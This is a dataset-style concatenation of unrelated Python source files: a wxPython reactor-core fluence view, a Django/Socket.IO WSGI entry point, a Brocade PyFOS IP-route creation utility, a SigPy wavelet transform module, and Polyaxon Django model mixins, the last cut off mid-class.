#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetTitle() -
#----------------------------------------------------------------------
def GetTitle( self ):
return 'Vessel Core Axial 2D View'
#end GetTitle
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetToolButtonDefs() -
#----------------------------------------------------------------------
#m def GetToolButtonDefs( self ):
#m """
#m"""
#m return self.toolButtonDefs
#m #end GetToolButtonDefs
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._HiliteBitmap() -
#----------------------------------------------------------------------
def _HiliteBitmap( self, bmap, config = None ):
result = bmap
if config is None:
config = self.config
core = self.dmgr.GetCore()
if config is not None and core is not None:
line_wd = -1
rect = None
rel_axial = self.axialValue.pinIndex - self.cellRange[ 1 ]
# if self.mode == 'xz':
# rel_cell = self.assemblyAddr[ 1 ] - self.cellRange[ 0 ]
# else:
# rel_cell = self.assemblyAddr[ 2 ] - self.cellRange[ 0 ]
rel_cell = 0
if rel_cell >= 0 and rel_cell < self.cellRange[ -2 ] and \
rel_axial >= 0 and rel_axial < self.cellRange[ -1 ]:
assy_wd = config[ 'assemblyWidth' ]
axial_levels_dy = config[ 'coreAxialLevelsDy' ]
core_region = config[ 'coreRegion' ]
line_wd = config[ 'lineWidth' ]
#pin_wd = config[ 'pinWidth' ]
axial_y = core_region[ 1 ]
for ax in range( len( axial_levels_dy ) - 1, rel_axial, -1 ):
axial_y += axial_levels_dy[ ax ]
rect = [
rel_cell * assy_wd + core_region[ 0 ], axial_y,
assy_wd, axial_levels_dy[ rel_axial ]
]
#end if selection w/in image
# -- Draw?
# --
if rect is not None:
new_bmap = self._CopyBitmap( bmap )
dc = wx.MemoryDC( new_bmap )
gc = wx.GraphicsContext.Create( dc )
gc.SetPen(
wx.ThePenList.FindOrCreatePen(
HILITE_COLOR_primary,
line_wd, wx.PENSTYLE_SOLID
)
)
path = gc.CreatePath()
path.AddRectangle( *rect )
gc.StrokePath( path )
dc.SelectObject( wx.NullBitmap )
result = new_bmap
#end if rect
#end if config
return result
#end _HiliteBitmap
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._InitEventHandlers() -
#----------------------------------------------------------------------
def _InitEventHandlers( self ):
"""
"""
#self._SetMode( 'core' )
self.bitmapCtrl.Bind( wx.EVT_CONTEXT_MENU, self._OnContextMenu )
#self.bitmapCtrl.Bind( wx.EVT_LEFT_DOWN, self._OnLeftDown )
self.bitmapCtrl.Bind( wx.EVT_LEFT_UP, self._OnLeftUp )
self.bitmapCtrl.Bind( wx.EVT_MOTION, self._OnMouseMotion )
#end _InitEventHandlers
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._IsAssemblyAware() -
#----------------------------------------------------------------------
def _IsAssemblyAware( self ):
"""
@return False
"""
return False
#end _IsAssemblyAware
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.IsTupleCurrent() -
#----------------------------------------------------------------------
def IsTupleCurrent( self, tpl ):
"""Compares tuple created with _CreateStateTuple( self ).
@param tpl tuple of state values
@return True if it matches the current state, false otherwise
"""
#m th = self.fluenceAddr.thetaIndex
#m if self.mode == 'xz':
#m t = ( self.stateIndex, self.assemblyAddr[ 2 ], self.subAddr[ 1 ], th )
#m else:
#m t = ( self.stateIndex, self.assemblyAddr[ 1 ], self.subAddr[ 0 ], th )
t = ( self.stateIndex, self.fluenceAddr.thetaIndex )
return tpl == t
#end IsTupleCurrent
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._LoadDataModelUI() -
#----------------------------------------------------------------------
def _LoadDataModelUI( self, reason ):
"""Updates self.angleSlider range based on coreSym.
Must be called on the UI thread.
"""
core = self.dmgr.GetCore()
r = ( 0, 359 ) if core is not None and core.coreSym == 1 else ( 0, 89 )
self.angleSlider.SetRange( *r )
self.angleSlider.SetValue( r[ 0 ] )
#end _LoadDataModelUI
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._LoadDataModelValues() -
#----------------------------------------------------------------------
def _LoadDataModelValues( self, reason ):
"""
"""
if (reason & STATE_CHANGE_coordinates) > 0:
self.assemblyAddr = self.state.assemblyAddr
self.subAddr = self.state.subAddr
if (reason & STATE_CHANGE_curDataSet) > 0:
self.curDataSet = self._FindFirstDataSet( self.state.curDataSet )
if (reason & STATE_CHANGE_fluenceAddr) > 0:
self.fluenceAddr.update( self.state.fluenceAddr )
self.fluenceAddr.dataSetName = \
self._FindFirstDataSet( self.fluenceAddr.dataSetName, ds_type = 'fluence' )
ds_type = self.dmgr.GetDataSetType( self.curDataSet )
self.channelMode = self.dmgr.IsChannelType( self.curDataSet )
self.nodalMode = self.dmgr.IsNodalType( ds_type )
#end _LoadDataModelValues
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.LoadProps() -
#----------------------------------------------------------------------
def LoadProps( self, props_dict ):
"""Called to load properties. This implementation is a noop and should
be overridden by subclasses.
@param props_dict dict object from which to deserialize properties
"""
#for k in ( 'assemblyAddr', 'auxNodeAddrs', 'nodeAddr', 'subAddr', 'mode' ):
for k in ( 'assemblyAddr', 'nodeAddr', 'subAddr' ):
if k in props_dict:
setattr( self, k, props_dict[ k ] )
super( VesselCoreAxial2DView, self ).LoadProps( props_dict )
#end LoadProps
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnAngleSlider() -
#----------------------------------------------------------------------
def _OnAngleSlider( self, ev ):
"""Handles events from the angle slider. Called on the UI thread.
"""
ev.Skip()
obj = ev.GetEventObject()
val = obj.GetValue()
self.GetTopLevelParent().GetApp().\
DoBusyEventOp( self._OnAngleSliderImpl, val )
#end _OnAngleSlider
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnAngleSliderImpl() -
#----------------------------------------------------------------------
def _OnAngleSliderImpl( self, val ):
"""Handles events from the angle slider. Called on the UI thread.
"""
core = self.dmgr.GetCore()
val_ndx = core.fluenceMesh.GetThetaIndex( val * math.pi / 180.0 )
if val_ndx >= 0 and val_ndx != self.fluenceAddr.thetaIndex:
fluence_addr = self.fluenceAddr.copy()
fluence_addr.update( thetaIndex = val_ndx )
self.FireStateChange( fluence_addr = fluence_addr )
#end _OnAngleSliderImpl
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnClick() -
#----------------------------------------------------------------------
def _OnClick( self, ev ):
"""
"""
x = ev.GetX()
y = ev.GetY()
self.GetTopLevelParent().GetApp().DoBusyEventOp( self._OnClickImpl, x, y )
#end _OnClick
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnClickImpl() -
#----------------------------------------------------------------------
def _OnClickImpl( self, x, y ):
"""
"""
valid = False
cell_info = self.FindCell( x, y )
if cell_info is not None:
valid = self.dmgr.IsValid(
self.curDataSet,
axial_level = cell_info[ 0 ],
assembly_index = cell_info[ 1 ]
)
if valid:
state_args = {}
state_args[ 'assembly_addr' ] = cell_info[ 1 : 4 ]
state_args[ 'axial_value' ] = self.dmgr.GetAxialValue(
self.curDataSet, core_ndx = cell_info[ 0 ]
)
self.FireStateChange( **state_args )
#end if valid
#end _OnClickImpl
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnFindMinMax() -
#----------------------------------------------------------------------
def _OnFindMinMax( self, mode, all_states_flag, all_assy_flag, ev ):
"""Calls _OnFindMinMaxPin().
"""
self.GetTopLevelParent().GetApp().DoBusyEventOp(
self._OnFindMinMaxImpl, mode, all_states_flag, all_assy_flag
)
#end _OnFindMinMax
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._OnFindMinMaxImpl() -
#----------------------------------------------------------------------
def _OnFindMinMaxImpl( self, mode, all_states_flag, all_assy_flag ):
"""Calls _OnFindMinMaxPin().
"""
if self.config and self.fluenceAddr and self.fluenceAddr.dataSetName:
self._OnFindMinMaxFluence(
mode, self.fluenceAddr, all_states_flag,
self.config.get( 'fluenceDataSetExpr' ),
self.config.get( 'radiusStartIndex', 0 )
)
#end _OnFindMinMaxImpl
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.SaveProps() -
#----------------------------------------------------------------------
def SaveProps( self, props_dict, for_drag = False ):
"""Called to save properties. Subclasses should override calling this
method via super.SaveProps().
@param props_dict dict object to which to serialize properties
"""
super( VesselCoreAxial2DView, self ).SaveProps( props_dict, for_drag = for_drag )
for k in ( 'assemblyAddr', 'nodeAddr', 'subAddr' ):
props_dict[ k ] = getattr( self, k )
#end SaveProps
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.SetDataSet() -
#----------------------------------------------------------------------
def SetDataSet( self, qds_name ):
"""May be called from any thread.
"""
ds_type = self.dmgr.GetDataSetType( qds_name )
if ds_type == 'fluence':
if qds_name != self.fluenceAddr.dataSetName:
self.fluenceAddr.SetDataSetName( qds_name )
wx.CallAfter( self.UpdateState, resized = True )
self.FireStateChange( fluence_addr = self.fluenceAddr )
elif qds_name != self.curDataSet:
wx.CallAfter( self.UpdateState, cur_dataset = qds_name )
self.FireStateChange( cur_dataset = qds_name )
#end SetDataSet
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.SetMode() -
#----------------------------------------------------------------------
#m def SetMode( self, mode, button = None ):
#m """May be called from any thread.
#m@param mode either 'xz' or 'yz', defaulting to the former on
#m any other value
#m@param button optional button to update
#m"""
#m if mode != self.mode:
#m self.mode = 'yz' if mode == 'yz' else 'xz'
#m self.cellRange = list( self.GetInitialCellRange() )
#m del self.cellRangeStack[ : ]
#m
#m wx.CallAfter( self._SetModeImpl, button )
#m #end SetMode
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._SetModeImpl() -
#----------------------------------------------------------------------
#m def _SetModeImpl( self, button = None ):
#m """Must be called from the event thread.
#m@param mode mode, already setjdd
#m any other value
#m@param button optional button to update
#m"""
#m if button is None:
#m for ch in self.GetParent().GetControlPanel().GetChildren():
#m if isinstance( ch, wx.BitmapButton ) and \
#m ch.GetToolTip().GetTip().find( 'Toggle Slice' ) >= 0:
#m button = ch
#m break
#m #end if
#m
#m if button is not None:
#m if self.mode == 'yz':
#m bmap = Widget.GetBitmap( 'X_16x16' )
#m tip_str = 'Toggle Slice to X-Axis'
#m else:
#m bmap = Widget.GetBitmap( 'Y_16x16' )
#m tip_str = 'Toggle Slice to Y-Axis'
#m
#m button.SetBitmapLabel( bmap )
#m button.SetToolTip( wx.ToolTip( tip_str ) )
#m button.Update()
#m self.GetParent().GetControlPanel().Layout()
#m #end if
#m
#m self.Redraw()
#m #end _SetModeImpl
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._UpdateControls() -
#----------------------------------------------------------------------
def _UpdateControls( self ):
"""Must be called from the UI thread.
"""
core = self.dmgr.GetCore()
if self.angleSlider is not None and core is not None:
theta_deg = core.fluenceMesh.\
GetTheta( self.fluenceAddr.thetaIndex, center = False, units = 'deg' )
if theta_deg != self.angleSlider.GetValue():
self.angleSlider.SetValue( theta_deg )
#end _UpdateControls
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._UpdateDataSetStateValues() -
#----------------------------------------------------------------------
def _UpdateDataSetStateValues( self, ds_type, clear_zoom_stack = False ):
"""Updates channelmode and nodalMode properties.
Args:
ds_type (str): dataset category/type
clear_zoom_stack (boolean): True to clear in zoom stack
"""
self.cellRange = list( self.GetInitialCellRange() )
del self.cellRangeStack[ : ]
self.channelMode = self.dmgr.IsChannelType( self.curDataSet )
self.nodalMode = self.dmgr.IsNodalType( ds_type )
#end _UpdateDataSetStateValues
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._UpdateStateValues() -
#----------------------------------------------------------------------
def _UpdateStateValues( self, **kwargs ):
"""
@return kwargs with 'changed' and/or 'resized'
"""
kwargs = super( VesselCoreAxial2DView, self )._UpdateStateValues( **kwargs )
changed = kwargs.get( 'changed', False )
resized = kwargs.get( 'resized', False )
update_controls = False
core = self.dmgr.GetCore()
if 'assembly_addr' in kwargs and \
kwargs[ 'assembly_addr' ] != self.assemblyAddr:
changed = True
self.assemblyAddr = kwargs[ 'assembly_addr' ]
# if 'node_addr' in kwargs:
# node_addr = self.dmgr.NormalizeNodeAddr( kwargs[ 'node_addr' ] )
# if node_addr != self.nodeAddr:
# self.nodeAddr = node_addr
# if 'sub_addr' in kwargs and kwargs[ 'sub_addr' ] != self.subAddr:
# if kwargs[ 'sub_addr' ][ pin_ndx ] != self.subAddr[ pin_ndx ]:
# resized = True
# else:
# changed = True
# self.subAddr = self.dmgr.NormalizeSubAddr(
# kwargs[ 'sub_addr' ],
# 'channel' if self.channelMode else 'pin'
# )
# #end if 'sub_addr'
if 'fluence_addr' in kwargs and \
kwargs[ 'fluence_addr' ] != self.fluenceAddr:
resized = update_controls = True
self.fluenceAddr.update( self.state.fluenceAddr )
if 'weights_mode' in kwargs:
kwargs[ 'resized' ] = True
if update_controls or resized:
wx.CallAfter( self._UpdateControls )
if changed:
kwargs[ 'changed' ] = True
if resized:
kwargs[ 'resized' ] = True
return kwargs
#end _UpdateStateValues
#end VesselCoreAxial2DView
| 38.071061 | 119 | 0.547609 |
4a1f3fd0de8790a9d889edb92d8563c71e697f82 | 681 | py | Python | djangoxtermjs/wsgi.py | MahmoudAlyy/docker-django-ui | 1175aa06527e27c6f529afa6616165fddafd6290 | [
"MIT"
] | 1 | 2021-05-10T05:10:41.000Z | 2021-05-10T05:10:41.000Z | djangoxtermjs/wsgi.py | MahmoudAlyy/docker-django-ui | 1175aa06527e27c6f529afa6616165fddafd6290 | [
"MIT"
] | null | null | null | djangoxtermjs/wsgi.py | MahmoudAlyy/docker-django-ui | 1175aa06527e27c6f529afa6616165fddafd6290 | [
"MIT"
] | 1 | 2021-02-17T11:15:12.000Z | 2021-02-17T11:15:12.000Z | """
WSGI config for djangoxtermjs project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'djangoxtermjs.settings'
import socketio
import eventlet
import eventlet.wsgi
from xterm.views import sio
from djangoxtermjs.settings import static_files
from django.core.wsgi import get_wsgi_application
django_app = get_wsgi_application()
#serve static file
application = socketio.WSGIApp(sio, django_app,static_files=static_files)
eventlet.wsgi.server(eventlet.listen(('', 8000)), application)
| 23.482759 | 78 | 0.800294 |
4a1f3fe8887ffea80dd1ac02a056c166f30f84f8 | 4,671 | py | Python | pyfos/utils/extension/extension_ip_route_create.py | brocade/pyfos | 33565cfc1401f5dc54a9a9fb70913c9a670cb322 | [
"Apache-2.0"
] | 44 | 2017-11-17T12:03:11.000Z | 2022-02-03T20:57:56.000Z | pyfos/utils/extension/extension_ip_route_create.py | brocade/pyfos | 33565cfc1401f5dc54a9a9fb70913c9a670cb322 | [
"Apache-2.0"
] | 13 | 2018-10-09T15:34:15.000Z | 2022-02-24T20:03:17.000Z | pyfos/utils/extension/extension_ip_route_create.py | brocade/pyfos | 33565cfc1401f5dc54a9a9fb70913c9a670cb322 | [
"Apache-2.0"
] | 23 | 2017-12-14T18:08:33.000Z | 2022-02-03T15:33:40.000Z | #!/usr/bin/env python3
# Copyright © 2018 Broadcom. All Rights Reserved. The term “Broadcom” refers to
# Broadcom Inc. and/or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may also obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`extension_ip_route_create` - PyFOS util for creating an IP route.
********************************************************************************
The :mod:`extension_ip_route_create` util is used to create an IP route.
This module is a stand-alone script that can be used to create an IP route.
extension_ip_route_create.py: Usage
* Infrastructure Options:
* -i,--ipaddr=IPADDR: The IP address of the FOS switch.
* -L,--login=LOGIN: The login name.
* -P,--password=PASSWORD: The password.
* -f,--vfid=VFID: The VFID to which the request is directed.
* -s,--secured=MODE: The HTTPS mode "self" or "CA" [Optional].
* -v,--verbose: Verbose mode [Optional].
* Util Script Options:
* -n,--name=NAME: Sets the name.
* -g,--ip-gateway=VALUE: Sets the IP gateway.
* -p,--ip-prefix-length=VALUE: Sets the IP prefix length.
* -d,--dp-id=VALUE: Sets the DP ID.
* --ip-address=VALUE: Sets the IP address.
* Output:
* Python dictionary content with RESTCONF response data.
.. function:: extension_ip_route_create.create_extension_ip_route(session,\
name, dp, ip, prefix, gateway)
*Create an Extension IP Route*
Example Usage of the Method::
ret = extension_ip_route_create.create_extension_ip_route(
session, name,dp, ip, prefix, gateway)
print (ret)
Details::
IProute = {
"name": name,
"dp-id": dp,
"ip-address": ip
"ip-prefix-length": prefix
"ip-gateway": gateway
}
result = extension_ip_route_create._create_extension_ip_route(
session, IProute)
* Input:
:param session: The session returned by the login.
:param name: Sets the GE_Port name expressed as slot/port.
:param dp-id: Sets the DP instance.
:param ip: Sets the extension IP address.
:param prefix: Sets the prefix length for the IP address.
:param gateway: Sets the IP address of the gateway.
* Output:
:rtype: A dictionary of return status matching the REST response.
*Use Cases*
Create a new extension IP route.
"""
import sys
from pyfos import pyfos_auth
from pyfos import pyfos_util
from pyfos.pyfos_brocade_extension_ip_route import extension_ip_route
from pyfos.utils import brcd_util
isHttps = "0"
def _create_extension_ip_route(session, iprouteobject):
result = iprouteobject.post(session)
return result
def create_extension_ip_route(session, name, dp, ip, prefix, gateway):
value_dict = value_dict = {'name': name, 'dp-id': dp, 'ip-address': ip,
'ip-prefix-length': prefix,
'ip-gateway': gateway}
iprouteobject = extension_ip_route(value_dict)
result = _create_extension_ip_route(session, iprouteobject)
return result
def validate(iprouteobject):
if iprouteobject.peek_name() is None or\
iprouteobject.peek_dp_id() is None or\
iprouteobject.peek_ip_prefix_length() is None or\
iprouteobject.peek_ip_address() is None or\
iprouteobject.peek_ip_gateway() is None:
return 1
return 0
def main(argv):
# myinput = str("-h -i 10.17.3.70 -n 4/17 -d 0 " +
# "--ip-address 154.10.10.0 " +
# "-g 134.10.10.25 -p 24 ")
# argv = myinput.split()
filters = ["name", "ip_prefix_length", "ip_address", "dp_id",
"ip_gateway"]
inputs = brcd_util.parse(argv, extension_ip_route, filters, validate)
iprouteobject = inputs['utilobject']
session = brcd_util.getsession(inputs)
result = _create_extension_ip_route(session, iprouteobject)
pyfos_util.response_print(result)
pyfos_auth.logout(session)
if __name__ == "__main__":
main(sys.argv[1:])
| 33.604317 | 80 | 0.633055 |
4a1f403cdc4b00d42d52e62b5118c937bbc66ca0 | 8,183 | py | Python | sigpy/wavelet.py | Phillistan16/sigpy | 4f83c7b7d4560f9f6fc169de301011f541a9be68 | [
"BSD-3-Clause"
] | null | null | null | sigpy/wavelet.py | Phillistan16/sigpy | 4f83c7b7d4560f9f6fc169de301011f541a9be68 | [
"BSD-3-Clause"
] | null | null | null | sigpy/wavelet.py | Phillistan16/sigpy | 4f83c7b7d4560f9f6fc169de301011f541a9be68 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Wavelet transform functions.
"""
import numpy as np
import pywt
from sigpy import backend
__all__ = ['fwt', 'iwt']
def get_wavelet_shape(shape, wave_name, axes, level):
input = np.zeros(shape)
tmp = fwt(input, wave_name=wave_name, axes=axes, level=level)
return tmp.shape
def apply_dec_along_axis(input, axes, dec_lo, dec_hi, level, apply_zpad):
"""Apply wavelet decomposition along axes.
Helper function to recursively apply decomposition wavelet filters
along axes.
Args:
input (array): Input array.
axes (tuple of int): Axes to perform wavelet transform.
dec_lo (array): Wavelet coefficients for approximation coefficients.
dec_hi (array): Wavelet coefficients for decimation coefficients.
level (int): Level to determine amount of zero-padding.
apply_zpad (bool): Set to true to apply z-pad.
"""
assert type(axes) == tuple
assert dec_lo.shape == dec_hi.shape
if (len(axes) == 0):
return input
# Loading sigpy.
device = backend.get_device(input)
xp = device.xp
axis = axes[0]
# Zero padding.
x = input
if (apply_zpad):
pad_size = (1 + (dec_hi.size * level + x.shape[axis])//(2**level)) * \
2 ** level - x.shape[axis]
pad_array = [(0, pad_size) if k == axis else (0, 0)
for k in range(len(x.shape))]
x = xp.pad(x, pad_array, 'constant', constant_values=(0, 0))
# Fourier space.
X = xp.fft.fftn(x, axes=(axis,))
lo = xp.zeros((x.shape[axis],)).astype(xp.complex64)
lo[:dec_lo.size] = dec_lo
lo = xp.reshape(xp.fft.fftn(xp.roll(lo, -(dec_lo.size//2)), axes=(0,)),
[lo.size if k == axis else 1 for k in range(len(x.shape))])
hi = xp.zeros((x.shape[axis],)).astype(xp.complex64)
hi[:dec_hi.size] = dec_hi
hi = xp.reshape(xp.fft.fftn(xp.roll(hi, -(dec_hi.size//2)), axes=(0,)),
[hi.size if k == axis else 1 for k in range(len(x.shape))])
# Apply convolutions.
y_lo = xp.fft.ifftn(X * lo, axes=(axis,))
y_hi = xp.fft.ifftn(X * hi, axes=(axis,))
# Sub-sampling
y_lo = xp.take(y_lo, [t * 2 for t in range(0, y_lo.shape[axis]//2)],
axis=axis)
y_hi = xp.take(y_hi, [t * 2 for t in range(0, y_hi.shape[axis]//2)],
axis=axis)
# Apply recursion to other axis and concatenate.
return xp.concatenate((apply_dec_along_axis(y_lo, axes[1:], dec_lo,
dec_hi, level, apply_zpad),
apply_dec_along_axis(y_hi, axes[1:], dec_lo,
dec_hi, level, apply_zpad)), axis=axis)
def apply_rec_along_axis(input, axes, rec_lo, rec_hi):
"""Apply wavelet recomposition along axes.
Helper function to recursively apply decomposition wavelet filters
along axes. Assumes input has been appropriately zero-padded by
apply_dec_along_axis (used by fwt).
Args:
input (array): Input array.
axes (tuple of int): Axes to perform wavelet transform.
rec_lo (array): Wavelet coefficients for approximation coefficients.
rec_hi (array): Wavelet coefficients for decimation coefficients.
"""
assert type(axes) == tuple
assert rec_lo.shape == rec_hi.shape
if (len(axes) == 0):
return input
# Load sigpy.
device = backend.get_device(input)
xp = device.xp
axis = axes[0]
# Preparing filters.
lo = xp.zeros((input.shape[axis],)).astype(xp.complex64)
lo[:rec_lo.size] = rec_lo
lo = xp.reshape(xp.fft.fftn(xp.roll(lo, 1-(rec_lo.size//2)), axes=(0,)),
[lo.size if k == axis else 1
for k in range(len(input.shape))])
hi = xp.zeros((input.shape[axis],)).astype(xp.complex64)
hi[:rec_hi.size] = rec_hi
hi = xp.reshape(xp.fft.fftn(xp.roll(hi, 1-(rec_hi.size//2)), axes=(0,)),
[hi.size if k == axis else 1
for k in range(len(input.shape))])
# Coefficient indices.
lo_coeffs = tuple([slice(0, input.shape[k]//2)
if k == axis else slice(0, None)
for k in range(len(input.shape))])
hi_coeffs = tuple([slice(input.shape[k]//2, None)
if k == axis else slice(0, None)
for k in range(len(input.shape))])
# Extracting coefficients.
x_lo = xp.zeros(input.shape).astype(xp.complex64)
x_hi = xp.zeros(input.shape).astype(xp.complex64)
sample_idx = tuple([slice(0, None, 2)
if k == axis else slice(0, None)
for k in range(len(input.shape))])
x_lo[sample_idx] = input[lo_coeffs]
x_hi[sample_idx] = input[hi_coeffs]
# Apply convolutions.
X_lo = xp.fft.fftn(x_lo, axes=(axis,))
X_hi = xp.fft.fftn(x_hi, axes=(axis,))
y_lo = xp.fft.ifftn(X_lo * lo, axes=(axis,))
y_hi = xp.fft.ifftn(X_hi * hi, axes=(axis,))
# Apply recursion to other axis and concatenate.
return apply_rec_along_axis(y_lo + y_hi, axes[1:], rec_lo, rec_hi)
def fwt(input, wave_name='db4', axes=None, level=None, apply_zpad=True):
"""Forward wavelet transform.
Args:
input (array): Input array.
wave_name (str): Wavelet name.
axes (None or tuple of int): Axes to perform wavelet transform.
level (None or int): Number of wavelet levels.
apply_zpad (bool): If true, zero-pad for linear convolution.
"""
device = backend.get_device(input)
xp = device.xp
if axes is None:
axes = tuple([k for k in range(len(input.shape))
if input.shape[k] > 1])
if (type(axes) == int):
axes = (axes,)
wavdct = pywt.Wavelet(wave_name)
dec_lo = xp.array(wavdct.dec_lo)
dec_hi = xp.array(wavdct.dec_hi)
if level is None:
level = pywt.dwt_max_level(
xp.min(xp.array([input.shape[ax] for ax in axes])),
dec_lo.size)
if level <= 0:
return input
assert level > 0
y = apply_dec_along_axis(input, axes, dec_lo, dec_hi, level, apply_zpad)
approx_idx = tuple([slice(0, y.shape[k]//2)
if k in axes else slice(0, None)
for k in range(len(input.shape))])
y[approx_idx] = fwt(y[approx_idx], wave_name=wave_name,
axes=axes, level=level-1, apply_zpad=False)
return y
def iwt(input, oshape, wave_name='db4', axes=None, level=None, inplace=False):
"""Inverse wavelet transform.
Args:
input (array): Input array.
oshape (tuple): Output shape.
wave_name (str): Wavelet name.
axes (None or tuple of int): Axes to perform wavelet transform.
level (None or int): Number of wavelet levels.
inplace (bool): Modify input array in place.
"""
device = backend.get_device(input)
xp = device.xp
if axes is None:
axes = tuple([k for k in range(len(input.shape))
if input.shape[k] > 1])
if (type(axes) == int):
axes = (axes,)
wavdct = pywt.Wavelet(wave_name)
rec_lo = xp.array(wavdct.rec_lo)
rec_hi = xp.array(wavdct.rec_hi)
if level is None:
level = pywt.dwt_max_level(
xp.min(xp.array([input.shape[ax] for ax in axes])),
rec_lo.size)
if level <= 0:
return input
assert level > 0
for ax in axes:
assert input.shape[ax] % 2 == 0
x = input if inplace else input.astype(xp.complex64).copy()
approx_idx = tuple([slice(0, input.shape[k]//2)
if k in axes else slice(0, None)
for k in range(len(input.shape))])
x[approx_idx] = iwt(x[approx_idx], input[approx_idx].shape,
wave_name=wave_name, axes=axes, level=level-1,
inplace=True)
y = apply_rec_along_axis(x, axes, rec_lo, rec_hi)
crop_idx = tuple([slice(0, oshape[k])
if k in axes else slice(0, None)
for k in range(len(input.shape))])
return y[crop_idx]
| 33.4 | 79 | 0.582427 |
4a1f40c67476927f55498537edaeaf10fa08ffa6 | 7,344 | py | Python | polyaxon/db/models/utils.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | polyaxon/db/models/utils.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | polyaxon/db/models/utils.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | import uuid
from django.contrib.postgres.fields import ArrayField, JSONField
from django.core.cache import cache
from django.core.validators import validate_slug
from django.db import models
from django.utils.functional import cached_property
from libs.blacklist import validate_blacklist_name
from libs.spec_validation import validate_outputs_config, validate_persistence_config
from polyaxon_schemas.environments import OutputsConfig, PersistenceConfig
class DescribableModel(models.Model):
description = models.TextField(blank=True, null=True)
class Meta:
abstract = True
@property
def has_description(self):
return bool(self.description)
class NameableModel(models.Model):
name = models.CharField(
max_length=256,
blank=True,
null=True,
default=None,
validators=[validate_slug, validate_blacklist_name])
class Meta:
abstract = True
class SequenceManager(models.Manager):
def get_queryset(self):
return super().get_queryset().order_by('sequence')
class SequenceModel(models.Model):
sequence = models.PositiveSmallIntegerField(
editable=False,
null=False)
objects = models.Manager()
sequence_objects = SequenceManager()
class Meta:
abstract = True
def _set_sequence(self, filter_query):
if self.pk is None:
last = filter_query.last()
self.sequence = 1
if last:
self.sequence = last.sequence + 1
class DiffModel(models.Model):
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
class RunTimeModel(models.Model):
started_at = models.DateTimeField(blank=True, null=True)
finished_at = models.DateTimeField(blank=True, null=True)
class Meta:
abstract = True
class TypeModel(models.Model):
name = models.CharField(max_length=128, unique=True)
schema_definition = models.TextField()
class Meta:
abstract = True
def __str__(self):
return self.name
class TagModel(models.Model):
tags = ArrayField(
base_field=models.CharField(max_length=64),
blank=True,
null=True,
help_text='The parameters used for this experiment.')
class Meta:
abstract = True
class PersistenceModel(models.Model):
persistence = JSONField(
null=True,
blank=True,
help_text='The persistence definition.',
validators=[validate_persistence_config])
class Meta:
abstract = True
@cached_property
def persistence_config(self):
return PersistenceConfig.from_dict(self.persistence) if self.persistence else None
@cached_property
def persistence_data(self):
return self.persistence_config.data if self.persistence_config else None
@cached_property
def persistence_outputs(self):
return self.persistence_config.outputs if self.persistence_config else None
class OutputsModel(models.Model):
outputs = JSONField(
null=True,
blank=True,
help_text='The persistence definition.',
validators=[validate_outputs_config])
outputs_refs = models.OneToOneField(
'db.OutputsRefs',
related_name='+',
blank=True,
null=True,
editable=False,
on_delete=models.SET_NULL)
class Meta:
abstract = True
@cached_property
def outputs_config(self):
return OutputsConfig.from_dict(self.outputs) if self.outputs else None
@cached_property
def outputs_jobs(self):
return self.outputs_config.jobs if self.outputs_config else None
@cached_property
def outputs_experiments(self):
return self.outputs_config.experiments if self.outputs_config else None
@cached_property
def outputs_refs_jobs(self):
if not self.outputs_refs:
return None
specs = self.outputs_refs.get_jobs_outputs_spec()
if not specs:
return None
# Return an ordered list
refs = []
for job in self.outputs_jobs:
refs.append(specs[int(job)])
return refs
@cached_property
def outputs_refs_experiments(self):
if not self.outputs_refs:
return None
specs = self.outputs_refs.get_experiments_outputs_spec()
if not specs:
return None
# Return an ordered list
refs = []
for experiment in self.outputs_experiments:
refs.append(specs[int(experiment)])
return refs
class Singleton(DiffModel):
"""A base model to represents a singleton."""
class Meta:
abstract = True
def set_cache(self):
cache.set(self.__class__.__name__, self)
def save(self, *args, **kwargs): # pylint:disable=arguments-differ
self.pk = 1
super().save(*args, **kwargs)
self.set_cache()
def delete(self, *args, **kwargs): # pylint:disable=arguments-differ
pass
@classmethod
def may_be_update(cls, obj):
raise NotImplementedError # noqa
@classmethod
def load(cls):
raise NotImplementedError # noqa
class StatusModel(models.Model):
